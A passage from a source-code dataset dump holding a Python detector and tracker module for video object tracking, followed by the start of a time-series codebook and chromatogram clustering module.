generic_post_process\nfrom utils.debugger import Debugger\nfrom dataset.dataset_factory import get_dataset\nfrom model.nms_wrapper import nms\n\nclass InfLoss(torch.nn.Module):\n    def __init__(self):\n        super(InfLoss, self).__init__()\n        self.eps = 1e-9\n        self.pool = torch.nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)\n        # self.pool = torch.nn.MaxPool2d(3, stride=1, padding=1)\n        self.mseloss = torch.nn.MSELoss(reduction='none')\n        self.cos = torch.nn.CosineSimilarity(dim=0, eps=1e-6)\n\n    def forward(self, pre_out, out):\n        pre_hm = pre_out[\"hm\"]\n        hm = out[\"hm\"]\n        offset = out['tracking']\n\n        p_0_y, p_0_x = torch.meshgrid(torch.arange(0, hm.shape[2]), torch.arange(0, hm.shape[3]))\n        p_0_y, p_0_x = p_0_y.contiguous(), p_0_x.contiguous()\n        p_0 = torch.stack((p_0_x, p_0_y), dim=0).unsqueeze(0).repeat(hm.shape[0], 1, 1, 1).to(hm.device)\n        p_0 = p_0.clone() + offset\n        # p_0[:, 0, :, :] = torch.clamp(p_0[:, 0, :, :], 0, hm.shape[3] - 1) # this operation would lose gradients\n        # p_0[:, 1, :, :] = torch.clamp(p_0[:, 1, :, :], 0, hm.shape[2] - 1)\n        p_0 = p_0.permute(0, 2, 3, 1)\n        p_0[:, :, :, 0] = p_0[:, :, :, 0] / ((p_0.shape[2] - 1) / 2) - 1\n        p_0[:, :, :, 1] = p_0[:, :, :, 1] / ((p_0.shape[1] - 1) / 2) - 1\n        hmf = torch.nn.functional.grid_sample(hm, p_0, mode='bilinear',\n                                              padding_mode='border', align_corners=False)\n\n        mask = (pre_hm == pre_hm.max(dim=1, keepdim=True)[0]).to(dtype=torch.int32)\n        mask = torch.mul(mask, pre_hm)\n\n        # zero = torch.zeros_like(mask)\n        # mask = torch.where(mask < 0.3, zero, mask)\n\n        mask = torch.sum(mask, dim=1, keepdim=True)\n        pre_hm2 = torch.softmax(pre_out[\"hm\"]/2.0, dim=1)\n        # loss_hm = self.l2_loss(hm[:,0,:,:], out[\"hm\"][:,0,:,:], mask)\n        loss_hm1 = self.l2_loss(pre_hm[:,0,:,:], hmf[:,0,:,:], mask)\n        # loss_hm2 = self.l2_loss(pre_hm2[:, 1, :, :], hmf[:, 1, :, :], mask)\n\n\n        loss_wh = self.l2_loss(pre_out[\"wh\"], out[\"wh\"], mask)\n        # loss_ltrb = 0.5 * self.l2_loss(pre_out[\"ltrb_amodal\"], out[\"ltrb_amodal\"], mask)\n        loss_off = self.cos_loss(pre_out[\"tracking\"], out[\"tracking\"], mask)\n\n        dist_pre = torch.norm(pre_out[\"tracking\"], dim=1)\n        dist = torch.norm(out[\"tracking\"], dim=1)\n\n        loss_off2 = self.l2_loss(dist_pre, dist, mask)\n        loss = loss_hm1 + loss_wh + loss_off + loss_off2\n        return loss\n\n\n    def l2_loss(self, pre_out, out, mask):\n        loss = self.mseloss(pre_out, out)\n        loss = torch.sum(loss * mask)\n        # loss = ((pre_out - out) ** 2 * mask) + self.eps\n        # loss = torch.sum(loss) ** 0.5\n        return loss\n\n    
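# cos_loss: confidence-masked (1 - cosine similarity) penalty between the previous-frame and current-frame offset fields\n    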
def cos_loss(self, pre_out, out, mask):\n loss = mask * (1-self.cos(pre_out, out))\n return 0.5 * torch.sum(loss)\n\nclass Detector(object):\n def __init__(self, opt):\n if opt.gpus[0] >= 0:\n opt.device = torch.device('cuda')\n else:\n opt.device = torch.device('cpu')\n if opt.track_method == \"byte\":\n from utils.byteTracker import Tracker\n elif opt.track_method == \"sort\":\n from utils.sort import MCSortT as Tracker\n else:\n from utils.tracker import Tracker\n\n print('Creating model...')\n self.model = create_model(\n opt.arch, opt.heads, opt.head_conv, opt=opt)\n self.model = load_model(self.model, opt.load_model, opt)\n self.model = self.model.to(opt.device)\n self.model.eval()\n\n self.opt = opt\n self.trained_dataset = get_dataset(opt.dataset)\n self.mean = np.array(\n self.trained_dataset.mean, dtype=np.float32).reshape(1, 1, 3)\n self.std = np.array(\n self.trained_dataset.std, dtype=np.float32).reshape(1, 1, 3)\n self.pause = not opt.no_pause\n self.rest_focal_length = self.trained_dataset.rest_focal_length \\\n if self.opt.test_focal_length < 0 else self.opt.test_focal_length\n self.flip_idx = self.trained_dataset.flip_idx\n self.cnt = 0\n self.pre_images = None\n self.pre_image_ori = None\n self.tracker = Tracker(opt)\n self.leiji_htmap = None\n self.debugger = Debugger(opt=opt, dataset=self.trained_dataset)\n if self.opt.inference_train:\n self.optimizer = torch.optim.Adam(self.model.parameters(), opt.lr)\n self.loss = InfLoss()\n self.pre_output = None\n\n def reset(self):\n self.cnt = 0\n self.pre_images = None\n self.pre_image_ori = None\n self.leiji_htmap = None\n self.tracker.reset()\n\n def reset_tracking(self):\n self.tracker.reset()\n self.pre_images = None\n self.pre_image_ori = None\n self.leiji_htmap = None\n\n def run(self, image_or_path_or_tensor, meta={}, f_rst=[], other_bbox=[], cnt=0):\n load_time, pre_time, net_time, dec_time, post_time = 0, 0, 0, 0, 0\n merge_time, track_time, tot_time, display_time = 0, 0, 0, 0\n self.debugger.clear()\n start_time = time.time()\n\n # read image\n pre_processed = False\n if isinstance(image_or_path_or_tensor, np.ndarray):\n image = image_or_path_or_tensor\n elif type(image_or_path_or_tensor) == type(''):\n image = cv2.imread(image_or_path_or_tensor)\n else:\n image = image_or_path_or_tensor['image'][0].numpy()\n pre_processed_images = image_or_path_or_tensor\n pre_processed = True\n\n loaded_time = time.time()\n load_time += (loaded_time - start_time)\n\n detections = []\n\n # for multi-scale testing\n for scale in self.opt.test_scales:\n scale_start_time = time.time()\n if not pre_processed:\n # not prefetch testing or demo\n images, meta = self.pre_process(image, scale, meta)\n else:\n # prefetch testing\n images = pre_processed_images['images'][scale][0]\n meta = pre_processed_images['meta'][scale]\n meta = {k: v.numpy()[0] for k, v in meta.items()}\n if 'pre_dets' in pre_processed_images['meta']:\n meta['pre_dets'] = pre_processed_images['meta']['pre_dets']\n if 'cur_dets' in pre_processed_images['meta']:\n meta['cur_dets'] = pre_processed_images['meta']['cur_dets']\n\n images = images.to(self.opt.device, non_blocking=self.opt.non_block_test)\n\n # initializing tracker\n pre_hms, pre_inds = None, None\n if self.opt.tracking:\n # initialize the first frame\n if self.pre_images is None:\n print('Initialize tracking!')\n self.pre_images = images\n self.tracker.init_track(\n meta['pre_dets'] if 'pre_dets' in meta else [])\n\n if self.opt.pre_hm:\n # render input heatmap from tracker status\n # pre_inds is not used in the 
current version.\n # We used pre_inds for learning an offset from previous image to\n # the current image.\n if self.opt.leiji_test:\n pre_dets, pre_hms, pre_inds = self._get_additional_inputs(\n self.tracker.tracks, meta, with_hm=not self.opt.zero_pre_hm, other_bbox=other_bbox)\n else:\n pre_hms, pre_inds = self._get_additional_inputs(\n self.tracker.tracks, meta, with_hm=not self.opt.zero_pre_hm, other_bbox=other_bbox)\n\n pre_process_time = time.time()\n pre_time += pre_process_time - scale_start_time\n\n # run the network\n # output: the output feature maps, only used for visualizing\n # dets: output tensors after extracting peaks\n if self.opt.leiji_test:\n output, dets, forward_time = self.process(\n images, self.pre_images, pre_hms, pre_inds, return_time=True, pre_dets=pre_dets)\n else:\n output, dets, forward_time = self.process(\n images, self.pre_images, pre_hms, pre_inds, return_time=True)\n if self.opt.inference_train and self.pre_output is None:\n for key in output:\n output[key] = output[key].detach()\n self.pre_output = output\n elif self.opt.inference_train:\n loss = self.loss(self.pre_output, output)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n for key in output:\n output[key] = output[key].detach()\n self.pre_output = output\n net_time += forward_time - pre_process_time\n decode_time = time.time()\n dec_time += decode_time - forward_time\n\n # convert the cropped and 4x downsampled output coordinate system\n # back to the input image coordinate system\n result = self.post_process(dets, meta, scale)\n post_process_time = time.time()\n post_time += post_process_time - decode_time\n\n\n detections.append(result)\n if self.opt.debug >= 1:\n self.debug(\n self.debugger, images, result, output, scale,\n pre_images=self.pre_images if not self.opt.no_pre_img else None,\n pre_hms=pre_hms)\n\n # merge multi-scale testing results\n results = self.merge_outputs(detections)\n if self.opt.give_first_gt and len(f_rst) != 0:\n results = f_rst\n if self.opt.give_sot_gt and cnt == 1:\n for i in range(len(results)):\n if results[i]['score'] > self.opt.track_thresh:\n results[i]['score'] = 1\n\n torch.cuda.synchronize()\n end_time = time.time()\n merge_time += end_time - post_process_time\n\n if self.opt.tracking:\n # public detection mode in MOT challenge\n public_det = meta['cur_dets'] if self.opt.public_det else None\n # add tracking id to results\n results = self.tracker.step(results, public_det)\n self.pre_images = images\n\n tracking_time = time.time()\n track_time += tracking_time - end_time\n tot_time += tracking_time - start_time\n\n if self.opt.debug >= 1:\n self.show_results(self.debugger, image, results)\n self.cnt += 1\n\n show_results_time = time.time()\n display_time += show_results_time - end_time\n\n # return results and run time\n ret = {'results': results, 'tot': tot_time, 'load': load_time,\n 'pre': pre_time, 'net': net_time, 'dec': dec_time,\n 'post': post_time, 'merge': merge_time, 'track': track_time,\n 'display': display_time}\n if self.opt.save_video or self.opt.mysave_imgs:\n try:\n # return debug image for saving video\n ret.update({'generic': self.debugger.imgs['generic']})\n except:\n pass\n return ret\n\n def _transform_scale(self, image, scale=1):\n '''\n Prepare input image in different testing modes.\n Currently support: fix short size/ center crop to a fixed size/\n keep original resolution but pad to a multiplication of 32\n '''\n height, width = image.shape[0:2]\n new_height = int(height * scale)\n new_width = int(width * 
scale)\n if self.opt.fix_short > 0:\n if height < width:\n inp_height = self.opt.fix_short\n inp_width = (int(width / height * self.opt.fix_short) + 63) // 64 * 64\n else:\n inp_height = (int(height / width * self.opt.fix_short) + 63) // 64 * 64\n inp_width = self.opt.fix_short\n c = np.array([width / 2, height / 2], dtype=np.float32)\n s = np.array([width, height], dtype=np.float32)\n elif self.opt.fix_res:\n inp_height, inp_width = self.opt.input_h, self.opt.input_w\n c = np.array([new_width / 2., new_height / 2.], dtype=np.float32)\n s = max(height, width) * 1.0\n # s = np.array([inp_width, inp_height], dtype=np.float32)\n else:\n inp_height = (new_height | self.opt.pad) + 1\n inp_width = (new_width | self.opt.pad) + 1\n c = np.array([new_width // 2, new_height // 2], dtype=np.float32)\n s = np.array([inp_width, inp_height], dtype=np.float32)\n resized_image = cv2.resize(image, (new_width, new_height))\n return resized_image, c, s, inp_width, inp_height, height, width\n\n def pre_process(self, image, scale, input_meta={}):\n '''\n Crop, resize, and normalize image. Gather meta data for post processing\n and tracking.\n '''\n resized_image, c, s, inp_width, inp_height, height, width = \\\n self._transform_scale(image)\n trans_input = get_affine_transform(c, s, 0, [inp_width, inp_height])\n out_height = inp_height // self.opt.down_ratio\n out_width = inp_width // self.opt.down_ratio\n trans_output = get_affine_transform(c, s, 0, [out_width, out_height])\n\n inp_image = cv2.warpAffine(\n resized_image, trans_input, (inp_width, inp_height),\n flags=cv2.INTER_LINEAR)\n inp_image = ((inp_image / 255. - self.mean) / self.std).astype(np.float32)\n\n images = inp_image.transpose(2, 0, 1).reshape(1, 3, inp_height, inp_width)\n if self.opt.flip_test:\n images = np.concatenate((images, images[:, :, :, ::-1]), axis=0)\n images = torch.from_numpy(images)\n meta = {'calib': np.array(input_meta['calib'], dtype=np.float32) \\\n if 'calib' in input_meta else \\\n self._get_default_calib(width, height)}\n meta.update({'c': c, 's': s, 'height': height, 'width': width,\n 'out_height': out_height, 'out_width': out_width,\n 'inp_height': inp_height, 'inp_width': inp_width,\n 'trans_input': trans_input, 'trans_output': trans_output})\n if 'pre_dets' in input_meta:\n meta['pre_dets'] = input_meta['pre_dets']\n if 'cur_dets' in input_meta:\n meta['cur_dets'] = input_meta['cur_dets']\n return images, meta\n\n def _trans_bbox(self, bbox, trans, width, height):\n '''\n Transform bounding boxes according to image crop.\n '''\n bbox = np.array(copy.deepcopy(bbox), dtype=np.float32)\n bbox[:2] = affine_transform(bbox[:2], trans)\n bbox[2:] = affine_transform(bbox[2:], trans)\n bbox[[0, 2]] = np.clip(bbox[[0, 2]], 0, width - 1)\n bbox[[1, 3]] = np.clip(bbox[[1, 3]], 0, height - 1)\n return bbox\n\n def _get_additional_inputs(self, dets, meta, with_hm=True, other_bbox=None):\n '''\n Render input heatmap from previous trackings.\n '''\n trans_input, trans_output = meta['trans_input'], meta['trans_output']\n inp_width, inp_height = meta['inp_width'], meta['inp_height']\n out_width, out_height = meta['out_width'], meta['out_height']\n input_hm = np.zeros((1, inp_height, inp_width), dtype=np.float32)\n pre_detm = np.zeros((2, inp_height, inp_width), dtype=np.float32)\n\n output_inds = []\n for det in dets:\n if det['score'] < self.opt.pre_thresh or det['active'] == 0:\n continue\n bbox = self._trans_bbox(det['bbox'], trans_input, inp_width, inp_height)\n bbox_out = self._trans_bbox(\n det['bbox'], trans_output, out_width, 
out_height)\n h, w = bbox[3] - bbox[1], bbox[2] - bbox[0]\n if (h > 0 and w > 0):\n radius = gaussian_radius((math.ceil(h), math.ceil(w)))\n if self.opt.big_radius:\n radius = max(radius, min(math.ceil(h), math.ceil(w)) / 2.0)\n radius = max(0, int(radius))\n ct = np.array(\n [(bbox[0] + bbox[2]) / 2, (bbox[1] + bbox[3]) / 2], dtype=np.float32)\n ct_int = ct.astype(np.int32)\n if with_hm:\n draw_umich_gaussian(input_hm[0], ct_int, radius)\n if self.opt.leiji_test:\n draw_umich_gaussian(pre_detm[det['class']-1], ct_int, radius)\n ct_out = np.array(\n [(bbox_out[0] + bbox_out[2]) / 2,\n (bbox_out[1] + bbox_out[3]) / 2], dtype=np.int32)\n output_inds.append(ct_out[1] * out_width + ct_out[0])\n for det in other_bbox:\n bbox = self._trans_bbox(det['bbox'], trans_input, inp_width, inp_height)\n bbox_out = self._trans_bbox(\n det['bbox'], trans_output, out_width, out_height)\n h, w = bbox[3] - bbox[1], bbox[2] - bbox[0]\n if (h > 0 and w > 0):\n radius = gaussian_radius((math.ceil(h), math.ceil(w)))\n if self.opt.big_radius:\n radius = max(radius, min(math.ceil(h), math.ceil(w)) / 2.0)\n radius = max(0, int(radius))\n ct = np.array(\n [(bbox[0] + bbox[2]) / 2, (bbox[1] + bbox[3]) / 2], dtype=np.float32)\n ct_int = ct.astype(np.int32)\n if with_hm:\n draw_umich_gaussian(input_hm[0], ct_int, radius)\n # if self.opt.leiji_test:\n # draw_umich_gaussian(pre_detm[det['class']-1], ct_int, radius)\n ct_out = np.array(\n [(bbox_out[0] + bbox_out[2]) / 2,\n (bbox_out[1] + bbox_out[3]) / 2], dtype=np.int32)\n output_inds.append(ct_out[1] * out_width + ct_out[0])\n if with_hm:\n input_hm = input_hm[np.newaxis]\n pre_detm = pre_detm[np.newaxis]\n if self.opt.flip_test:\n input_hm = np.concatenate((input_hm, input_hm[:, :, :, ::-1]), axis=0)\n pre_detm = np.concatenate((pre_detm, pre_detm[:, :, :, ::-1]), axis=0)\n input_hm = torch.from_numpy(input_hm).to(self.opt.device)\n pre_detm = torch.from_numpy(pre_detm).to(self.opt.device)\n pre_detm = F.interpolate(pre_detm, scale_factor=0.25)\n output_inds = np.array(output_inds, np.int64).reshape(1, -1)\n output_inds = torch.from_numpy(output_inds).to(self.opt.device)\n if self.opt.leiji_test:\n return pre_detm, input_hm, output_inds\n return input_hm, output_inds\n\n def _get_default_calib(self, width, height):\n calib = np.array([[self.rest_focal_length, 0, width / 2, 0],\n [0, self.rest_focal_length, height / 2, 0],\n [0, 0, 1, 0]])\n return calib\n\n def _sigmoid_output(self, output):\n if 'hm' in output:\n output['hm'] = output['hm'].sigmoid_()\n if 'hm_hp' in output:\n output['hm_hp'] = output['hm_hp'].sigmoid_()\n if 'dep' in output:\n output['dep'] = 1. 
/ (output['dep'].sigmoid() + 1e-6) - 1.\n output['dep'] *= self.opt.depth_scale\n return output\n\n def _flip_output(self, output):\n average_flips = ['hm', 'wh', 'dep', 'dim']\n neg_average_flips = ['amodel_offset']\n single_flips = ['ltrb', 'nuscenes_att', 'velocity', 'ltrb_amodal', 'reg',\n 'hp_offset', 'rot', 'tracking', 'pre_hm']\n for head in output:\n if head in average_flips:\n output[head] = (output[head][0:1] + flip_tensor(output[head][1:2])) / 2\n if head in neg_average_flips:\n flipped_tensor = flip_tensor(output[head][1:2])\n flipped_tensor[:, 0::2] *= -1\n output[head] = (output[head][0:1] + flipped_tensor) / 2\n if head in single_flips:\n output[head] = output[head][0:1]\n if head == 'hps':\n output['hps'] = (output['hps'][0:1] +\n flip_lr_off(output['hps'][1:2], self.flip_idx)) / 2\n if head == 'hm_hp':\n output['hm_hp'] = (output['hm_hp'][0:1] + \\\n flip_lr(output['hm_hp'][1:2], self.flip_idx)) / 2\n\n return output\n\n def process(self, images, pre_images=None, pre_hms=None,\n pre_inds=None, return_time=False, pre_dets=None):\n if self.opt.inference_train:\n torch.cuda.synchronize()\n\n output = self.model(images, pre_images, pre_hms)[-1]\n output = self._sigmoid_output(output)\n output.update({'pre_inds': pre_inds})\n if self.opt.flip_test:\n output = self._flip_output(output)\n torch.cuda.synchronize()\n forward_time = time.time()\n if self.opt.atten_method != \"none\":\n if self.opt.leiji_test:\n if self.leiji_htmap is not None:\n self.leiji_htmap = 0.5 * pre_dets + 0.5 * self.leiji_htmap\n dets, self.model.heat_att, self.leiji_htmap = generic_decode(output, K=self.opt.K,\n opt=self.opt,\n leiji_htmap=self.leiji_htmap)\n elif self.opt.auto_thresh:\n dets, self.model.heat_att, self.opt.track_thresh = generic_decode(output, K=self.opt.K,\n opt=self.opt)\n self.opt.out_thresh = self.opt.track_thresh\n self.opt.new_thresh = self.opt.track_thresh\n else:\n dets, self.model.heat_att, self.model.offset = generic_decode(output, K=self.opt.K, opt=self.opt)\n else:\n dets = generic_decode(output, K=self.opt.K, opt=self.opt)\n torch.cuda.synchronize()\n for k in dets:\n dets[k] = dets[k].detach().cpu().numpy()\n if return_time:\n return output, dets, forward_time\n else:\n return output, dets\n else:\n with torch.no_grad():\n torch.cuda.synchronize()\n\n output = self.model(images, pre_images, pre_hms)[-1]\n output = self._sigmoid_output(output)\n output.update({'pre_inds': pre_inds})\n if self.opt.flip_test:\n output = self._flip_output(output)\n torch.cuda.synchronize()\n forward_time = time.time()\n if self.opt.atten_method != \"none\":\n if self.opt.leiji_test:\n if self.leiji_htmap is not None:\n self.leiji_htmap = 0.5*pre_dets + 0.5*self.leiji_htmap\n dets, self.model.heat_att, self.leiji_htmap = generic_decode(output, K=self.opt.K,\n opt=self.opt, leiji_htmap=self.leiji_htmap)\n elif self.opt.auto_thresh:\n dets, self.model.heat_att, self.opt.track_thresh = generic_decode(output, K=self.opt.K, opt=self.opt)\n self.opt.out_thresh = self.opt.track_thresh\n self.opt.new_thresh = self.opt.track_thresh\n else:\n dets, self.model.heat_att, self.model.offset = generic_decode(output, K=self.opt.K, opt=self.opt)\n else:\n dets = generic_decode(output, K=self.opt.K, opt=self.opt)\n torch.cuda.synchronize()\n for k in dets:\n dets[k] = dets[k].detach().cpu().numpy()\n if return_time:\n return output, dets, forward_time\n else:\n return output, dets\n\n def apply_nms(self, all_boxes, thresh):\n \"\"\"Apply non-maximum suppression to all predicted boxes output by the\n test_net 
method.\n \"\"\"\n num_classes = len(all_boxes)\n num_images = 1 # TODO: demo only support 1 batchsize now\n nms_boxes = []\n for cls_ind in range(num_classes):\n temp_boxes = np.array(all_boxes[cls_ind])\n for im_ind in range(num_images):\n boxes = []\n for box in all_boxes[cls_ind]:\n box_list = np.append(box[\"bbox\"], box[\"score\"])\n boxes.append(box_list)\n dets = np.array(boxes, dtype=np.float32)\n if len(dets) == 0:\n continue\n # print('dets', dets)\n x1 = dets[:, 0]\n y1 = dets[:, 1]\n x2 = dets[:, 2]\n y2 = dets[:, 3]\n scores = dets[:, 4]\n inds = np.where((x2 > x1) & (y2 > y1))[0]\n dets = dets[inds, :]\n if dets == []:\n continue\n\n keep = nms(dets, thresh)\n if len(keep) == 0:\n continue\n nms_boxes.append(temp_boxes[keep].tolist())\n return nms_boxes\n\n\n def post_process(self, dets, meta, scale=1):\n dets = generic_post_process(\n self.opt, dets, [meta['c']], [meta['s']],\n meta['out_height'], meta['out_width'], self.opt.num_classes,\n [meta['calib']], meta['height'], meta['width'])\n self.this_calib = meta['calib']\n\n if scale != 1:\n for i in range(len(dets[0])):\n for k in ['bbox', 'hps']:\n if k in dets[0][i]:\n dets[0][i][k] = (np.array(\n dets[0][i][k], np.float32) / scale).tolist()\n if self.opt.nms:\n dets = self.apply_nms(dets, self.opt.nms_thresh)\n if len(dets) == 0:\n return dets\n return dets[0]\n\n def merge_outputs(self, detections):\n assert len(self.opt.test_scales) == 1, 'multi_scale not supported!'\n results = []\n for i in range(len(detections[0])):\n if detections[0][i]['score'] > self.opt.out_thresh:\n results.append(detections[0][i])\n return results\n\n def debug(self, debugger, images, dets, output, scale=1,\n pre_images=None, pre_hms=None):\n img = images[0].detach().cpu().numpy().transpose(1, 2, 0)\n img = np.clip(((\n img * self.std + self.mean) * 255.), 0, 255).astype(np.uint8)\n pred = debugger.gen_colormap(output['hm'][0].detach().cpu().numpy())\n debugger.add_blend_img(img, pred, 'pred_hm')\n if 'hm_hp' in output:\n pred = debugger.gen_colormap_hp(\n output['hm_hp'][0].detach().cpu().numpy())\n debugger.add_blend_img(img, pred, 'pred_hmhp')\n\n if pre_images is not None:\n pre_img = pre_images[0].detach().cpu().numpy().transpose(1, 2, 0)\n pre_img = np.clip(((\n pre_img * self.std + self.mean) * 255.), 0, 255).astype(np.uint8)\n debugger.add_img(pre_img, 'pre_img')\n if pre_hms is not None:\n pre_hm = debugger.gen_colormap(\n pre_hms[0].detach().cpu().numpy())\n debugger.add_blend_img(pre_img, pre_hm, 'pre_hm')\n\n def show_results(self, debugger, image, results):\n debugger.add_img(image, img_id='generic')\n if self.opt.tracking:\n debugger.add_img(self.pre_image_ori if self.pre_image_ori is not None else image,\n img_id='previous')\n self.pre_image_ori = image\n\n for j in range(len(results)):\n if results[j]['score'] > self.opt.vis_thresh:\n if 'active' in results[j] and results[j]['active'] == 0:\n continue\n item = results[j]\n if ('bbox' in item):\n sc = item['score'] if self.opt.demo == '' or \\\n not ('tracking_id' in item) else item['tracking_id']\n sc = item['tracking_id'] if self.opt.show_track_color else sc\n\n debugger.add_coco_bbox(\n item['bbox'], item['class'] - 1, sc, img_id='generic')\n\n if 'tracking' in item:\n debugger.add_arrow(item['ct'], item['tracking'], img_id='generic')\n\n tracking_id = item['tracking_id'] if 'tracking_id' in item else -1\n if 'tracking_id' in item and self.opt.demo == '' and \\\n not self.opt.show_track_color:\n debugger.add_tracking_id(\n item['ct'], item['tracking_id'], 
img_id='generic')\n\n if (item['class'] in [1, 2]) and 'hps' in item:\n debugger.add_coco_hp(item['hps'], tracking_id=tracking_id,\n img_id='generic')\n\n if len(results) > 0 and \\\n 'dep' in results[0] and 'alpha' in results[0] and 'dim' in results[0]:\n debugger.add_3d_detection(\n image if not self.opt.qualitative else cv2.resize(\n debugger.imgs['pred_hm'], (image.shape[1], image.shape[0])),\n False, results, self.this_calib,\n vis_thresh=self.opt.vis_thresh, img_id='ddd_pred')\n debugger.add_bird_view(\n results, vis_thresh=self.opt.vis_thresh,\n img_id='bird_pred', cnt=self.cnt)\n if self.opt.show_track_color and self.opt.debug == 4:\n del debugger.imgs['generic'], debugger.imgs['bird_pred']\n if 'ddd_pred' in debugger.imgs:\n debugger.imgs['generic'] = debugger.imgs['ddd_pred']\n if self.opt.debug == 4:\n debugger.save_all_imgs(self.opt.debug_dir, prefix='{}'.format(self.cnt))\n elif self.opt.debug == 1:\n pass\n else:\n debugger.show_all_imgs(pause=self.pause)\n\n\n","repo_name":"LingyvKong/CFTracker","sub_path":"src/lib/detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":30912,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"28338006019","text":"from glob import glob\nimport json, datetime, time, os, random, platform, sys\n\nimport scipy\nfrom tslearn import metrics as tsm\nfrom matplotlib import colors\n\nfrom scipy import ndimage, signal\nimport scipy.spatial.distance as distance\nfrom scipy.spatial.distance import euclidean, pdist, squareform, cdist\nfrom scipy.cluster import hierarchy\nfrom scipy.cluster.hierarchy import dendrogram, linkage, fcluster\nfrom scipy.ndimage.filters import gaussian_filter1d\n\nimport numpy as np\nfrom numpy.lib.stride_tricks import as_strided\nnp.set_printoptions(precision=3, suppress=True) # suppress scientific float notation\n\nfrom eluent.dataset import get_file, mts2df, df2mts, MTS\nfrom eluent import visualization\nimport cmocean\n\nclass Codebook:\n \"\"\"Container class for a Codebook object. Must be constructed from an MTS Object. Contains methods for subsequence clustering and codeword extraction. 
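Typical flow: distill() to cluster the sampled subsequences, extract(K) to pick codewords, then apply(). 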
\"\"\"\n def __init__(self, mts):\n self.mts = mts\n self.distilled = False\n self.extracted = False\n\n # Extracts all subsequences and performs hierarchical clustering\n def distill(self, cull_threshold):\n sss = self.mts.samples\n word_shape = self.mts.word_shape\n self.cull = cull_threshold\n\n # Sample using greedy k-centers clustering\n N = sss.shape[0]\n first_center = random.randint(0, N)\n first_center = N // 2\n seed = sss[first_center]\n code_sample = np.delete(sss, first_center, 0)\n\n # Construct distance metric\n dtw = make_multivariate_dtw(word_shape)\n\n self.centers = sample_kcenters(code_sample, [seed], dtw, cull_threshold)\n M = self.centers.shape[0]\n self.M = M\n print('Sampled M={} centers, {:.2f}%% of original N={} sequences'.format(M, (M / N) * 100, N))\n print(\"--------------------------------------------------\")\n\n # Hierarchical clustering and pruning\n print('Hierarchical clustering...', end='\\r')\n self.linkage_matrix = linkage(self.centers, method='complete', metric=dtw)\n print(\"Generated hierarchical cluster\")\n self.distilled = True\n\n # Extracts K distinctive codewords from the codebook by pruning the dendrogram at the K-th level\n def extract(self, K):\n if not self.distilled:\n print(\"Must call Codebook.distill() before extract\")\n return\n\n self.K = K\n word_shape = self.mts.word_shape\n dtw = make_multivariate_dtw(word_shape)\n\n clusters = fcluster(self.linkage_matrix, K, criterion='maxclust')\n\n # Codeword extraction\n codebook = {}\n for i in range(len(clusters)):\n cluster_id = clusters[i]\n if not cluster_id in codebook:\n codebook[cluster_id] = []\n codebook[cluster_id].append(self.centers[i])\n\n\n for i in range(1, K+1):\n print(\"Codeword {}: Cluster size={}\".format(i, len(codebook[i])))\n\n # Computer centroid\n for k in codebook:\n codeset = np.array(codebook[k])\n dist = np.sum(squareform(distance.pdist(codeset, metric=dtw)), 0)\n clustroid = np.argmin(dist)\n codebook[k] = codeset[clustroid]\n\n self.codebook = codebook\n self.extracted = True\n\n self.reorder_colors = lambda x: x\n return codebook\n\n # Plots a dendrogram\n def visualize_linkage(self, d=0):\n if not self.distilled:\n print(\"Must call Codebook.distilled() before visualize_linkage\")\n\n return visualization.fancy_dendrogram(self.linkage_matrix, truncate_mode='lastp',\n p=12,\n leaf_rotation=90.,\n leaf_font_size=12.,\n show_contracted=True,\n annotate_above= 0.4, \n max_d=d)\n\n # Plots the codebook\n def visualize(self):\n if not self.extracted:\n print(\"Must call Codebook.extract() before visualize_codewords\")\n\n return visualization.vis_codewords(self)\n\n # Generates a Chromatogram object by applying the Codebook to the MTS matrix\n def apply(self):\n assert self.extracted, \"Must call Codebook.extract() before applying codebook\"\n \n return Chromatogram(self.mts, self)\n\nclass Chromatogram:\n \"\"\"Container class for a Chromatogram object. 
Contains methods for visualizing chromatograms and computing statistics.\"\"\"\n def __init__(self, mts, codebook):\n self.mts = mts\n self.codebook = codebook\n self.users = self.mts.users\n self.rendered = False\n\n # Renders the chromatogram by computing the closest codeword to each L-sequence in the original MTS matrix.\n # - smoothing_window: controls the window size for codeword smoothing\n # - segment_on: determines how to cluster the user (see segment_users method)\n # - reorder_colors: whether the most salient colors should be reassigned to codewords with the shortest duration\n def render(self, smoothing_window=0, segment_on='freqs', reorder_colors=True):\n\n def normalize(word):\n for i in range(word.shape[0]):\n std = np.std(word[i])\n if std == 0:\n word[i] = word[i] - np.mean(word[i])\n else:\n word[i] = (word[i] - np.mean(word[i])) / np.std(word[i])\n return word.flatten()\n\n sss = self.mts.samples\n N = len(sss)\n dtw = make_multivariate_dtw(self.mts.word_shape)\n\n results = []\n for i in range(N):\n w = normalize(sss[i].reshape(self.mts.word_shape))\n cw_dists = [dtw(cw, w) for cw in self.codebook.codebook.values()]\n results.append(cw_dists)\n\n bounds = self.mts.bounds\n sizes = []\n for i in range(len(bounds)-1):\n start = bounds[i]\n end = bounds[i+1]\n sizes.append(end-start)\n tn = max(sizes)\n\n chromatogram = np.zeros((len(bounds) - 1, tn))\n raw = np.zeros((len(bounds) - 1, tn))\n\n def window_smooth(data, S):\n output = []\n M = len(data)\n for i in range(M):\n min_val = max(i-(S // 2), 0)\n max_val = min(i+(S // 2), M)\n\n dsum = np.sum(data[min_val:max_val], axis=0)\n most_common = np.argmin(dsum) + 1\n output.append(most_common)\n return np.array(output)\n\n bounds = self.mts.bounds\n sizes = []\n for i in range(len(bounds)-1):\n start = bounds[i]\n end = bounds[i+1]\n sizes.append(end-start)\n\n for i in range(len(sizes)):\n data = np.array(results[bounds[i]:bounds[i+1]])\n\n if smoothing_window > 0:\n chromatogram[i, :sizes[i]] = window_smooth(data, smoothing_window)\n\n else:\n chromatogram[i, :sizes[i]] = np.argmin(data, axis=1) + 1\n\n raw[i, :sizes[i]] = np.argmin(data, axis=1) + 1\n\n self.chromatogram = chromatogram\n self.raw = raw\n\n self.smoothing_window = smoothing_window\n self.smoothing_stats()\n\n print(\"--------------------------------------------------\")\n if reorder_colors:\n self.reorder_colors()\n\n print(\"--------------------------------------------------\")\n self.segment_users(on=segment_on)\n self.rendered = True\n\n # Computes smoothing statistics:\n # - number of transitions (Δ)\n # - bandwidth mean and std\n def smoothing_stats(self):\n U, T = self.raw.shape\n\n raw_changes = 0\n smooth_changes = 